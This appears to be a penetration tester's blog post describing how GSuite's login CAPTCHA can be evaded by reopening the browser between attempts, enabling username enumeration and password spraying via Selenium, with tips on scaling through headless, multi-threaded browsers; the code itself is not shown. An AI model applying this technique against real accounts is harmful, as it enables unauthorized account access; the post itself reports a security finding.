While performing a recent assessment of an organization using GSuite, I discovered that the implementation of CAPTCHA to stop automated activity is wholly inadequate, and I was able to accomplish both username enumeration and password spraying with relative ease.
Classic Username Enumeration
I quickly discovered while interacting with this, that the best way to bypass the CAPTCHA is to just ignore it altogether.
So How to Beat the CAPTCHAs?
No complex machine learning to solve CAPTCHA puzzles. No rotating IP addresses through proxies. It was as easy as just programmatically closing the browser between each task and opening a new one. In each case, you would be able to supply at least an initial username without being prompted to solve a puzzle. So to do this ad infinitum, you simply have to automate the process of opening and closing the browser between each attempt. Fortunately, with Selenium, this is extremely easy to do.
For each email in the emails list, it will open a new browser instance and test whether the username is valid. And after running, you will have a list of which emails are valid, and which ones are not. Obviously, this is just a POC and doesn't scale well if you are going to be attempting to test thousands of email addresses. Of course, this could be resolved through multi-threading and then configuring the browsers to be headless.
Comments
Post a Comment